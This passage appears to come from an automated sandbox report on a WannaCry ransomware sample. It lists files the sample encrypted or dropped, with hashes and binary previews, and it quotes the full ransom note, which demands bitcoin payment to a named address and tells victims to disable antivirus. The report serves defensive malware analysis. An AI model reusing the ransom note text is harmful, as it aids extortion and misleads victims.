                                                  Preview:WANACRY!....=..1...6.U.!...:.g.BC.*..\...E.......Pz>N=.i...p..{HD.r8a.R.`../....F<:W....8..U./k.l...Q;PK....[.6...Z..x.CmhM?.......sD,...eT..r..3.A.re.{wB..@Q.d.......t..#....g..w....-.+.._S....7...i.t..!.......r.fp]}.Y..q....._...i....<....n..IP..Qc.v.:.$ky4...............oDP.|$..."...h..!....(...d..s!....CH\........n.......>R.wH4e+.).U.,8pq.\.].:.AeU......rC....E..t.....ha0.C..Lu".....}$......R....v........"..Y..]..@z.D....e=.l..Su"...Y....)..r.1[A..XDI.loj.r.......D..[.{]..e}.?.9.$]..I..9mv=T....7...W.'..EmB{:....[..5..:..'.....8..........H.z.-..e..].u....D:...R.(;...SC0..6y.....c.O6.-.K.Jjt.&.\N...v;=.n...#.{V..%.\......C..c.fn.......E...;..3-..@..w.......s`.1..x..Y.N,3.....G].91..u.U...x...M..)...g..I$v}...`....q..U4...z.Y.,|..6.~...'#...CglP.S...A+X*..*.W...1.d.U'....W....y/.G..C.......~./...m ../.+'l...@...y.T\.P..sL..%Q./..C?m.k.p..}.....%'.@.........y..[....}.R...0..&#....G(6..Sl1n...\.US......@ ....F.k.S..X.4..D.Pp..+V......

                                                  C:\Documents and Settings\user\Downloads\QNCYCDFIJJ.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8499076220924024
                                                  Encrypted:false
                                                  SSDEEP:24:bkzavLWVlAMaudXjQJDdQtdM/ik6goq9lzucH7I0ZGJlN8Wy3r7IB:bkigKudX8JDKtGieoulzuy7Il8HK
                                                  MD5:6D335E493CF884A70D790D21957D9B4C
                                                  SHA1:6B4D8AA5A3A7D2A833414717D6B0F6FAB0BE03EA
                                                  SHA-256:FEE51911873E925840155B3EA8A7FF35CA273F7BB6C47D8786BDB1E06F52EA27
                                                  SHA-512:9775BEF0D7F2459AD1E4F36D1FBA55E814D0FA1E3B767935C169D169474435C2C1503D03D089C5E6B6D3D9BF9A27EB7312FE8FE2DB20606AC73A0FFDBEE5B16C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....E.K.*....".\.Qc.I...8X.j...Q.......a@$....&.m.hdx....'.....oE....+...@$h.U.vQ<l.".....1T=b.M.......=..L.....W_.T.I...[.....l.J.N....x.D1g..MUT.....:.el.C.'.%..r..dB.........R...Z..."R.A.@.......Lk............56$....H.:..v.*........a..<.....I.............g...2..G.D.......?.q...q...t..w.S.....9.1..P<....T..dg.KUE..,u........G.6...y...@.......l..W........kd_h..deV.1.C{.u..<.z.C.Y.!C.z|d):5L...Q.>..G....z0O..a..qG.}...6...C.a.m.lD..&.d5.@..G%..8.R.b:...&!.(.l......p.>gq.u.K*K..m.nYP.].#...^tp..J.<.6.g..v.....X6d[u@.)..}q.....(J|..f.g<N.W.6....O..`.P&3d....h....:.E.s.=W..U0._s..W.1RS.{.}@B....X...'A........~...>.B..Z...../#.... 8.y...rD....^$<.w.Q...i.|.BV......'....-.J..+.j....}Q..Sv.....1.ab...b&<.s...t...0.D.$.5PFn..........q[o...F.i.k..H.I.F.,v.."..bRR.....{.p...r..Y.B;.Gn...k.n..&..... ~.O..J..Mc ],la/`...W.{....:..:.C....-.N..-R'.K....*.)9@...L;..e)yx.Na.!.m.c.&y..&m.g..F..6=y,........9...+...9f.=...A..r..t......g*.....E.....c..

                                                  C:\Documents and Settings\user\Downloads\QNCYCDFIJJ.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8310281743865335
                                                  Encrypted:false
                                                  SSDEEP:24:bkzfHAypy1EFokhyB9Fg0+p+srtOxsabWZxHqmbnCRZx4Hn1qZmu:bkzvAUASThy9jsrtOGabWZxHgv4C
                                                  MD5:941586C6E485BD375206922574C513C7
                                                  SHA1:B930B5D9EA2D1705A447714AA17B8C4858EA28DE
                                                  SHA-256:2A5BC380F46EDF84E64EC578474ED3916B0FBC0C59529F850873E5587F576774
                                                  SHA-512:BA3B36B9C17FD2EB45E6006038CA86CE0B6DF0AD4F525DD0CCC72DA82604649950C44D37436F98B0D14342232BFC4B4EDE2A28DC088908201CDE693DC4E3EABC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......Ee...K..c...a...w..#x.....-......nr"i.E.B..g\.W.r...Sg..V3Z.oU.. V...^rL.Z.M'.Pg-..;..!:.De2_N.$c... g.L.=@........Fzu.L.g.J(.K..-C.J.O|...kFd..|$.....RU...q.......:m.2../..F.2...Z)f..L....#W....^..Lqn.=.,.U*.pk[W.a.F..yf_s(.}.A.........5.n................!...g}.WZ.A......UN....~.5.h.N..@.s....I../.W.a-..@...*KUAlpo.j3z..J.lc....//K.&&b.8M.....N....53...JD\...\@.(.{.F.)b9.p.v.5.>K6f.....t*...q..y...U..08.|H....B..].t...._$....?..l..B.f.<.'z.....J\...888.>k...#pq.....gE7..].........3.. ....N7.pZp.y..6..v~...3iO,...o...AAMO.S.~...M..g.).r..2U..=.i.)G..9....#fLq....T.+.f2/..{e...X.R.N.J..Y=.&".....O.gO.....].H..{3....W...R.T....;...-..PI~...s7......q...?..}..,.P.)9'.v*Jk....... ..........k..pq_.....fD.{R?vj..hd...|I.......zy.L.dJ}.. ..g.Q...h&.\.-:.R]..{n.G....+..5.#.....wCt..S..]K.?t.l.V......E>..B..h7.U..n..(.++.%.gJO.....b.T.e.UD..a...T...D...8s)(l.W.....q..$6.J./.z0.....0EN'|c&...!....&...sG..s.M.......8..s...K.:...... ]m.D...j99.

                                                  C:\Documents and Settings\user\Downloads\ZQIXMVQGAH.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.857345873249316
                                                  Encrypted:false
                                                  SSDEEP:24:bk+nlYLsOWwrc3mz68lzQmMW3tPI3pfYiN2I7fYO2Myu1G0Ex02TvziHP7MJvjrb:bknLsUcWuLmMWtAZQvGYmu7vziHP7mBd
                                                  MD5:47F102326749FF57A0732F884AF0266D
                                                  SHA1:77354DDD18E32BEAB839C1416C8F6F75F84A7BDA
                                                  SHA-256:308A19024B147FBC4BE87291F308F1B2BEFE8B5C9549412959D8753FE31877D7
                                                  SHA-512:1070E934DACDFD2DCDC37EA737191E72FC95ED60093A4A5089439CD2140481FAF7173DD5D3F276895E122B751035C003DBAB216DB47E8F44AB15456F4811BB2B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....o...jF...a>.....k[.wN.D..sV.R...A..j!..]..LQ.....w|....1.h.v3..y..>0.^..#F]i5[....l[............~..9x..d...0O..=e....[...\..~9....M.AaB...W...G$......*1...e....)7.V...0R#\.v...K..X3d....*..ey...wi.o.)...w...YOC.p..N..47....S.,...5.....H(PJ.................C...as.PS.y'J2K*,....u.....a.tA."=..f.k^.S.=. .........T.e.....~.....h...9$9.~oX"&..,.7....v..i...V.).5.g..50..U._:K.zt...e..".MC...Ohq..ra...l.i........';hcADN.E.c...{...<..mY+...8......q.u.n..qu...I.u...&..d.L(..*..z...8..Q....qf}...X..6...p.|6S..@.Z.h.A=....!.......Y.....[T..~..`.x...+.q..).=.......~....9...i~r~G.8f.....t...:y...|h<<.b.7.v6A_.O..2.j...#. ~_....7..b...KX.....y=....r....[.!.I...3..;...3|..6.....T..P..="$.p..VW...o..6.~.....c..d.....%Y.v.R|..z .....R...f.Ga.CS......u.+U..,...`R.9.b.#l..l..ba..!,.....$u.:_.......J...}..$S.xR.JV....2Sb.....N+e.>u.^...*Q>.}W...w."M0dx.7...y....l..{@..ztr.m...h.....VX.Z.Q.,.L.....d.....8..36[[#1ua}.w.$...f.A.B...K.Vy.2.6....%v.[CF.

                                                  C:\Documents and Settings\user\Downloads\ZQIXMVQGAH.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.852353575907645
                                                  Encrypted:false
                                                  SSDEEP:24:bkmns7M68k6q89xg+q48lEqICiP4Psw1F6mXrBm89hxM8I:bkmnOHx6qlB4tqIGsw1F6KrBpFMj
                                                  MD5:B377A7AEFD366065EC2CEBBB6D7CD909
                                                  SHA1:4B9508A33FC5E7C8818471BA760B42271788AA65
                                                  SHA-256:158E4D6C1F955B94C9440F048FBAA612E3740268109F6A69A7808D4009F1BDE5
                                                  SHA-512:267C5DA8028447914B1DCA3A9289C195F6987973185028A9F6781D3397467CF3EDCE9A45D3260DD0834E52167FDCAD7DB523DE795F2339E72ECA01D27FACA720
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....r.;7J..6.V.....{.).C.a}O@..a^...I..N.C.Gp...b.H....=.%.O^....5`..3hH?L.F._.#A...^..v.~.W\C.{.....I.SC...(...x..'j.P$.&...thHM4x5..E.~f.....L.....1}.3..Ea+jd.....z.J.D.G..y..&.5...)../3..C{w.|,....k......M...u.m.4.C.H_..../..o..".......O.L$.f................2x..EDT?O../..>.s.;......bD..._.<..0."..v=.%"...p.3..th.s..*..U......f.'.i...Yt]CM.........Ooo..w.....X...g5..#.4<.#R.Hc..U./.Q].....~Q....]..K`..5....E3.?.6y...o...}..D..K.W.r.9=...p..-3.Fy....XS.O....*.T.../......."x..`9.....g.5sh.X..J.,....L...SN-.+l.]N....q.....[.J...........z.6..]w..K@...`..Qc.......,....n..iV=...".....> i...&..%a0".w.~`IZ.$....>.Q.y.Q....w.........H(,x....c....R.~......8.#.......n.p..Fur...%.........`..Tgp.T.....HF...L..A.z;.W...x...x..&.y.OX...~ ....y.3m..3.#...Y..B.F^...1,.7....Ss<b..<..e.W9..j..r.....2...!..\~S...+-..<...Pt...O:....O.-...X.vH.q|..F..h(..C~....v..-.J:.KSY...=Q..L......q..~M.h........S...T..P..eek..T%.>T..N...;.=..+[....&.{..

                                                  C:\ProgramData\Intel\GCC\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\ProgramData\Intel\GCC\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\ProgramData\Intel\GCC\IGCCSvc.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20760
                                                  Entropy (8bit):7.990145083899708
                                                  Encrypted:true
                                                  SSDEEP:384:Ewe/p880UYNR1LV+/WvbNtgvcvZgA9hK3fTn/k/hdfutPf/j1K93F:ypmUc5vb3xMT8Ghf/jsJF
                                                  MD5:255A7AEDBE93176C8452791CFFA427BC
                                                  SHA1:DEE4A532207CFBEE97C774FE8905A9F5E1DB4D44
                                                  SHA-256:51D15BD3BE0D6CEA87D363C5F65ECBE2822B3A576D2AC0437FA41591F6AE6A83
                                                  SHA-512:B6253B3A6C9FC86156C4A83A5705D4895CD8343057A52FD1C13132F21E33D6152D7F4B8E1A4577EF040997A257C26B2291DBACAB8F2A917E174F79F3BDC31F04
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......x..t....'I....e"H@..b......9..U.......v(w,Ze.b.I.'+;....S...*....{....~.>H.M..W....<..V.)e..m.P...&..k........J.T..(.G.Z...7..F...{y-j6.S.f.F.........#.....pA..VbO.E.Av......52j.L..;7.R..I....]GH..w.t.."..;[...rq.^+.W..ly;v.L0.o.mPf%.GH_#.....P.......o@..8.../4....I.TVhH.~....&..>...d.8a.h{..i....@.'..}..n2......0...e...ku.f.5~.S>......6.Q.n...A.w%._.%...!U..................'.}t.......\..HFTq._W:.;....0...;u..I.3.......b&8.y.J{^..?....r..E$h...S<os....:.O)~..Mf?.8..p.m..\..4...Q\..m..D.kM.H...6.l..}....b.}eJ...K0..xh.....W.?...#a.W.ZL...h...oUC..b.Q.....[K...M.......z.:h......ms._...%..@W....'#:.H[.C9.......O....d......Ri..Kn.$......m.>..J+..Y..._.y.....9.......G..2R.r...V..5e...a...-r.E0G../T+5.1(...D+..z..m....OR..c.3....p.~M)N...E.>...#.......Aw.%x..KA.[....."8q.a.`dlf....:W.[~...C..%..<]..M.9.rj...-.,.U`..5f~2..:L..(....`<O....,..{.^a.k]Ky..A..o......Jn.#.._..s.-h[0....MI'........l;.;&.G.!..Z.....|.U...e...L

                                                  C:\ProgramData\Intel\GCC\gcc_svc_log_2021-09-03.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1368
                                                  Entropy (8bit):7.840995518833475
                                                  Encrypted:false
                                                  SSDEEP:24:bkF4/SW7MrB297eFxjybuhTwSiBaeG+wsuBxMp4VYFXdhNPiDIEL+Qiz9FDJQ:bkF46W7MrBO7UxjIjQX7W4+5d3PiDIEn
                                                  MD5:F9254FD251DDE5DE89A2816266A8979A
                                                  SHA1:5C79CCCDA7F5E14CF5AA9EE028E4B9BECA057193
                                                  SHA-256:BFF3A77FB5FB64351CB364F160C984818C6C040E03C3D9C757AA59EAA8FEB210
                                                  SHA-512:07E348A7BBA0ACBDDA249C103D37092E02D13B0D7E3EC716B3EF1741E24837F96A58A677932424763DF28779203B991DBAFE6F5A28607FF536F83CE90D1CC84F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!............/R\.)q'....m.k.....h.;EI. ..j..E.^#.8.-....8S..`)B..`8.t..O......,.Z......)....u..E(...W..m...2....Rm.....H..7#.H.....Y...o...$.Ok. ....\.....'.....b.,..X.-.....H.s.~.o..9.5DL#....S.:.d.FO..T`o.U.....<9Iq=>gx..b.A..^6.S..._bwP.......=.......i.0.H..3.{.....I.Z.F....3..)m....%.M.z.o.S..b$sp.=^..Ed..ZR.ZF...t.S.m./....C.F.{'.Q...1.[..i..q>"}#..>Cg.,.V........e<^C...6<p.)'.4.l.j.JK...+......T.Y..x..\...K..].F^..a...0....RQ...C...><##o.............K.e}...;&j.....[..3....^zH(..Fgb.=..9.`Y...1.....5.=m.9......a...f.3.vh.x..<.I(.jxZ...".W..{.}.O./..N..V.N.uHV.91mc....2..!%.._9`.Y.......F..#_n.r..!.Ci...y%K......]3.....OFMa.D4.p`@.s.5&.:T'..i......#.R..rK.e..^wD...s..}.j...X..#.U.Z/..........W,.I..}..F.....'.kN..r..G.bd...ev^P..........6_..IS.V.B...Tn$...t.."Z..........\:.G'|.4'..FX.......B...NP.T.@./pA..o..Z.VV..3..0t'>;..(K...q...a..O.P.. ....}...T.N]...Urq.A.ga.j@`ifs..|.f.vy._..<{......&\...f....+...(I..w..l^.~. ..-p%..).,

                                                  C:\ProgramData\Intel\GCC\gcc_svc_log_2021-09-14.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5096
                                                  Entropy (8bit):7.964858957218272
                                                  Encrypted:false
                                                  SSDEEP:96:oDo+bbmjZPRATp+fOeV9s2wQMgV5FhiMRle/KzKJpjvwlRxDv:MWjmSOxn84YleyzQd4xDv
                                                  MD5:A125F004FE67F0883191214F1703715E
                                                  SHA1:2D686FFD7B21C0471B4198A7F987C7380AB52DD5
                                                  SHA-256:D28D3ABF00AD7EC551C55D67B108744C0BFAC9E873C5EF47AC9828FA059A087B
                                                  SHA-512:973197766551B6EE0ED9C78E97BBFA3F65AB3BC71023CECAC6E8E5B07C2DB259B4126D4A1CD7E57C2C5E42E1B48A122A0935F85A93491AF0EAFB5EC987E81644
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!..........A.R.....q. ...;6f..REl.]........J....H8D....7...U.b.7w."A`L%..WP...Y,qk}.]QE.....A.:U&.K+.VhS..f...a..zv.-E-.#@c...;A..*....=...\B"..|T..K.&C)b#5.A".q'.\...=vK..L......:O..Vk"Y.7.Mn.M...\M.....)Y@1.`8..k-..D.L....>..}p.2......$.C..X>M.S6...].&............B...5....m...Ah.1.-W.....?.*X...m..?=..C..d....D....x.N.NF.\...vW..>.P...u...i.....M..Y.\+Mj.y(....E.........)....hU...@"...Ed...r'@...../.....3...SG`@~.4x\F^..h.......x..r..V.R.g.u.h...e.S....yi..fo<|...Jf......e....`.-...kkY.".6|..(X.2.H.b.^.!.......vX..?.............o..y...y....!.z.G....g......e...J..h.=.....6.:W@n.<EGd....{c*].6..p....>RuK...N]....-.16..-.[QM....4.0..&<.X..N..C......RB.....D>GB..|....}:..q..|gr......_...h1.W...,..RT_.~.e-])...oW.>".Z.g.|IT...+%{....M....a/.[lN'U...<...s_!...F.(.....TY..*a..LS......fY.[.=..Q..N..."sv.[..Y.?&.... .....f?.c...6.I#WSm.,-..Ud..BH`.W..`...._S.....yL...7...`.'?...^...k}w.7n/..N.L.c.....M<...x.sF..I*d1e..8......5S1..b'~..A.....L.

                                                  C:\ProgramData\Intel\GCC\gcc_svc_log_2021-09-22.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5096
                                                  Entropy (8bit):7.9591959155291265
                                                  Encrypted:false
                                                  SSDEEP:96:oE0yCVXjl0ahP7O45KsUnuGryPxPjR/rjx8l7CKw1lCcV1c4qjF+m32:vHGdhP7Odry5J98h4lCcMVG
                                                  MD5:B495A26E8F1988F7950ED91A537CDAD5
                                                  SHA1:3EEF940B167652D6BC047672D926934E25CA328A
                                                  SHA-256:B0CCF1C5B84C7E2E434550B7232B3AFADFAB12BD4FF50E26B66894FE01D8A154
                                                  SHA-512:A9319283E61135F08E263B747EFD69044A45F4C1875447AC63CCDF9347CBC76C3CF2C0B1F454891C6474207E0BDD83B0FF315DB9346DD86282508B300DB8C152
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!........)..3.(..<.@...*....x)k.f.q......X.o.... ..... !.q..0..L....0......lB.Y.1%......`....-..u.P.q..y..>~....dea...XF...-.y..9b......g....2 .E...@.'vRS..Gy......:..Y.dj.v.Z...{.....d.}.#..:,R....-.l.f".i.M3.[.W{6n^..)...u.L|.>...K.....=h..._...................9.:...".........p.<2..->Y..S.....QaB..i...jn..y.2O&U..cR..{.V.8TH...9.$..+o=..u..&\P....>...d..{B.h....J..B#..&.|\x..-..nboJ..Z... ...!..u.5!..Tc.?.G....7A.m/.......4.~.(P..f..z.."..i.\r.4..U0.%.R.gAj.Q*..j3.K.[]...>b....X.S..k...>|.e.lV...S....xc...a...Y.E...6.sqnL..H.M..a.6........b..e.._..9....W.....?.....m...i....z..oXtt. 9..i>.nh....PDi..~'..t...VS..xA...Gl..P..T...)...j8.`../.....!...N.s..]..hw...;*}-....g.h.......N."....m..v.GTSu...X...3!.t.J....6.c..f.._p.=TE.9.RjJ..2c....Qf..x.9Tk.-u......PM.6..]u..Oh.$."....R.9..U...6h..*8.......%.JE....9?.....-.B....1...j...R..Q..i..dky....3.o..<.v.^-.0.3.)'...<O.i..I....{")..Yt~..A.......W..%D..l.....1.......E.k;..\....{n....T

                                                  C:\ProgramData\Intel\GCC\gcc_svc_log_2021-09-30.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1032
                                                  Entropy (8bit):7.757964197400796
                                                  Encrypted:false
                                                  SSDEEP:24:bkSO6ATc6kEjvt5N9cnvvdcBLt3MuPtKEqLH:bkSO6Aw2jUX6hXAEqLH
                                                  MD5:50D3DD6CBA00E4E0D02A6FF7CEFD9B2D
                                                  SHA1:BD29D6D99503704617A72D148E70210CE42E74D9
                                                  SHA-256:DE1CA328EA4A0A0CE138235FA173E9939394468FF0C85DDED7C672A6BEA52140
                                                  SHA-512:B348C9762E0F9D84A31FF1C546F42C13673DD29534EA4C7CCF4E8261E53BB1BFF57CA15672F6DDC5977F4FBBF694508A83F1DA2FDB98A1B4BC050A26BC7876CE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!..../..3G|0u..`A....I5F.t7E..1.....nRAk*...5.....-R...I.0.rNT..f.d..! ....eV.u....rV..4:.:..>.*.3.(h_.W.G....p......h..............V..H.1...LZ/...tO......I0.i..H..Q...k..].W..e.....El.W...!&.w.)E.,a........iLWf....]..+0..07_f2.m`.j.aS.<2....M..Q&............10.^...._5Gu&Q....d.$.....T .[.)[..mQ..e@1:7.......Q.I.}V.Y=...u.Av..%[L..V).z...[L<D.5....z.g...`m..........y..D.7`.....@g.q,....=........./..2H.......2.m..m..........%i..5........8./...&.....e...M...|..x_.Mp>}.$.LN4d.3...6R"...._V...NR=.)..D=.....................p.ed>.3.:.h..0...7Y..s.[.9...{.|...(=I..$V.W ...^0BF...mYb.jR-.A[X5.\c...;....O..Y}.....%...Q$........B.E....n..N6.f.._..... ....v.,7..>..=....;_......Z.. a#3N.j.D.w ....YaR..t.2.]p9..U..?}2 :P.oQ|p....B...Z.....wN...h&..B....|....w.........7-+ j.G"c..<..,...B.....*.D.X...T2j..*.Z....O.*..Y.0..A..o..z|...?.L........op.....D.....'.Vq.v.}..4..]p...@2I.ft...f.Uq.ildm?....&..s0.q.N..,..|7.1..,..O.j.@1.^UFA9/.....n.

                                                  C:\ProgramData\Intel\GCC\gcc_svc_log_2022-01-20.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1112
                                                  Entropy (8bit):7.844897200419837
                                                  Encrypted:false
                                                  SSDEEP:24:bkWBVdUFqGc04vsI/cfzafKseX1nArAp0Pe2DVHb9jcfs71+vHVHIzNx:bkWBox4vT/XfKpX1Arwj2DV79w4oKzNx
                                                  MD5:78932A9DF2EF36C829E438200A795F65
                                                  SHA1:B0B58019A6BFD177694F9503FF849656BA328213
                                                  SHA-256:49944B9ABA7845D5E2132536F2CD8DD53F39D2A233436AEA83028C48021DC7FE
                                                  SHA-512:A36B50BBB4A9C6AB5F018EA6F17E6DEA2216528CEE7007A9316428D8FE7222DEF29D4C039196A1E7C9DEFAD5A2AB4C1CA56C6E20610C768A5CB6C2D45629B5F4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......{..j..F..@.i[ ..O...Jd..{....*....K<...$..O.a6......$4y....._.!......<z.......veN.|....;.?.If...u[.7....(18q&..`.|.v!..d....y..4..^,i.y>de.2...'T.,.|..1a %.:...Rj.[.e.!D.....,..o...u5=F..dE..:...\.^..`.....^T......7.....\.....e..j....I........>.......a.8.m.P....K.x..#X[e.N..K.p..'G.6..f/w.......f..>gZ./.k?..-.@m..h.T...m-6.<.U.gQ.E.g...u.~.8./`...[?....C.X-.......V.....`j.!.w\.....0^.g.uf.m.J.....>.2.l.|...\.W.?.E..&.<..z..!..W.:.....Q.n..?E....c..s.3gR..z}).^+.g....P...;a.:..W|...;0......o...[.F.P.....t... F[8.f..1.?@h.!7.V.x........p.48../.fh.u.>....8...4.[.?o..hPpm.....e2.....N@...%x.oH..x.q../.......>./.s..?...U........tG0L.^,].G*..clq.gBN1.".j.B.f.....K..%5...v.$n.`$&?.u...tfR.q......$........).q.s7..^......s..K.e[/.....R...^...\..Kn.S.g2..m..l<ca..F0N~&9..a.>...`..8p.u.N.....<T*.....f.w...V.S.A.J.r.....K.....a.........c,.6....-.'.k.O)..vj....r..#....NC5..(.8.._..n.*}[k....N.,....@..w..]..:.....'..%.......1w.E..302..+.Q

                                                  C:\ProgramData\Intel\GCC\gcc_svc_log_2022-02-23.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1768
                                                  Entropy (8bit):7.880875703376416
                                                  Encrypted:false
                                                  SSDEEP:48:bkaPNiDsaQ0SSslLe44zPDPdeWpQSmOPC+jZvk0rzE:oaPNiDsaQPdr4TIW+TMNvdrw
                                                  MD5:8FDDECC7CD71B1641B2F95ABB9EEEC49
                                                  SHA1:B74A3DD04EE1304DDFA0526D59A39AF1FE03CBAD
                                                  SHA-256:462E2C0D75F5848406E692866F53D7F8F3169D7B438E6304B14B3A04432A1924
                                                  SHA-512:701BFD58C49F09610E05BA1AB88FCC611148EB6BD2667382E9BEAC4EF97666382C10551ECF62290526E21157CDCE96B629D5CCFDA348D7E2C3DAA65EEB3BEC63
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......./a...!D..~:..u.....#...w..x....*..2..Z-....%.c..c.".m.....I.N".@y(.d....78w.R.._......W.I.v0]i....V.....K...-......u..y..C.~.Q..%.W.K.....0/....I.G..<....U..`...c..}.:. .O..HW... ..`.1h...iU..:'4kX..\..F-.......C....-_m.._bf..-...!.{..K.................@...L...:Q*QU.4.w$.,..Ay.z...)... ..I.`........F...A...la..m..|.P,....n._...&...!o...I2.4............uE.......xp...8.!4.&.U..n.4....i....@...K.p#..0f.~....2...[.j)........-..C.x..sY.1...[..w.o....D../i...q...A..A..Q.6*.\.UGu........L%c...2r.)....(.....S....#....v..]....... ..?'0..".8...+..2....2.v\...).%9./8Y.77<.G.u.c.....p.z.v..}..>1.1..U....<l.......+/.zZ|...5...rX....".+...^.2<p/.J.K..:......&...~G.OpW;X.6.7co..F...r..0..8a..#U.........w.....G..Z.]........ew..W.....9.s..V.:~,<..$).N.nK..t|..b.....]C....7.7..k.Hx...x..R%..+<..:=,M.l.1....Z..yN.9...&.{~. ..i.&..D.....x@af..;..z/@u.b..`j...ym.*.-E.y..y.....o.DDN..v..ZU......,../%{.\6.n.K'.......i..B..Q.AxP..CO.u.n.5..Rz..

                                                  C:\ProgramData\Intel\GCC\gcc_svc_log_2023-05-15.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1032
                                                  Entropy (8bit):7.7768249846089965
                                                  Encrypted:false
                                                  SSDEEP:24:bk7rkF8iXJDLv3+0aFX5c+ehOAwg/EEghzOs5F9r:bkezXh7+9aHheg8EgQs5F9r
                                                  MD5:4E36B8C9DC7F15A4E214A9B219711992
